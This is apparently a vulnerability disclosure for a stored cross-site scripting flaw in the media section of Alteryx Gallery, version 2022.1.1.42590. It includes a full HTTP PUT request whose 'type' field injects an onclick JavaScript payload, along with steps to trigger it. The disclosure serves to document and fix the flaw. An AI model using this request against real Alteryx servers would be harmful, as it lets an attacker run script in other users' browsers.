Product: Alteryx
Version: (?, 2022.1.1.42590) - Tested on version 2022.1.1.42590
CVSS : 6.5 - CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C
Vulnerability: Stored Cross-site scripting (XSS) – Media
Using the media management feature, an admin is able to add an erroneous filetype instead of a valid one. Using this feature, the admin could inject JavaScript code and thus trigger a XSS.
- From an administrator user, go to the Media Section.
- Update a file to inject a malicious JavaScript code as shown in the following request:
PUT /gallery/api/media/$MEDIA_UUID/ HTTP/2
Host: alteryx-host.com
Cookie: $COOKIE
User-Agent: Mozilla
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Cache-Control: no-cache
X-Authorization: $AUTH
Content-Length: 176
Origin: https://alteryx-host.com
Referer: https://alteryx-host.com/gallery/admin/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{
"extension": ".None",
"fileName": "NULL",
"thumbnail": null,
"title": "NULL",
"type": "\"onclick='alert(\"XSS\")' style=display:block>Malware</option>",
"id": "$MEDIA_UUID"
}- The user open the media section and use the filter to select the "Malware" entry.
- The application triggers the execution of the JavaScript included inside the payload in the type.
Credit : GRILL Dylan